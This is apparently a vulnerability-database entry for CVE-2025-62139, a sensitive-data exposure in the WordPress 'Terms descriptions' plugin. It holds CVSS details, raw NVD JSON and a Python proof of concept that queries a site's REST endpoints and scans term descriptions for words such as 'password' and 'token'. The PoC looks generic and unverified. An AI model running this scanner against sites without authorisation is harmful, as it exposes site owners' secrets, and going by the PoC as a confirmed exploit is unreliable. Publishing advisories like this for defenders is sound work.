Security Vulnerability Report
中文
CVE-2025-62139 CVSS 5.3 MEDIUM

CVE-2025-62139

Published: 2025-12-31 15:15:53
Last Modified: 2026-04-23 15:34:37

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Vladimir Statsenko Terms descriptions terms-descriptions allows Retrieve Embedded Sensitive Data.This issue affects Terms descriptions: from n/a through <= 3.4.10.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

terms-descriptions插件 <= 3.4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62139 PoC - Sensitive Information Disclosure in terms-descriptions plugin # Affected Version: <= 3.4.10 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-62139 """ print(f"[*] Checking vulnerability for CVE-2025-62139 on {target_url}") # WordPress REST API endpoint for terms endpoints = [ "/wp-json/wp/v2/categories", "/wp-json/wp/v2/tags", "/wp-json/wp/v2/taxonomies" ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {url}") try: response = requests.get(url, timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive information in term descriptions for item in data if isinstance(data, list) else [data]: if isinstance(item, dict): # Look for description fields that might contain sensitive data if 'description' in item: desc = item['description'] if desc and len(desc) > 0: # Check for patterns indicating embedded sensitive data sensitive_patterns = ['key', 'secret', 'password', 'token', 'api_key', 'credential'] for pattern in sensitive_patterns: if pattern.lower() in str(desc).lower(): print(f"[!] Potential sensitive data found: {desc[:100]}") vulnerable = True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") # Alternative: Direct term page enumeration term_pages = [ "/?taxonomy=category&tag_ID=1", "/?taxonomy=post_tag&tag_ID=1" ] for page in term_pages: url = target_url.rstrip('/') + page try: response = requests.get(url, timeout=10) if response.status_code == 200: # Check page source for embedded sensitive information if 'term-description' in response.text or 'term_description' in response.text: print(f"[*] Term description field found on {url}") except requests.RequestException: pass if vulnerable: print("[+] Target appears to be VULNERABLE to CVE-2025-62139") return True else: print("[-] No obvious vulnerability indicators found") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62139-poc.py <target_url>") print("Example: python cve-2025-62139-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62139", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:52.887", "lastModified": "2026-04-23T15:34:36.867", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Vladimir Statsenko Terms descriptions terms-descriptions allows Retrieve Embedded Sensitive Data.This issue affects Terms descriptions: from n/a through <= 3.4.10."}, {"lang": "es", "value": "Vulnerabilidad de inserción de información sensible en datos enviados en descripciones de términos de Vladimir Statsenko permite recuperar datos sensibles incrustados. Este problema afecta a las descripciones de términos: desde n/d hasta 3.4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/terms-descriptions/vulnerability/wordpress-terms-descriptions-plugin-3-4-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}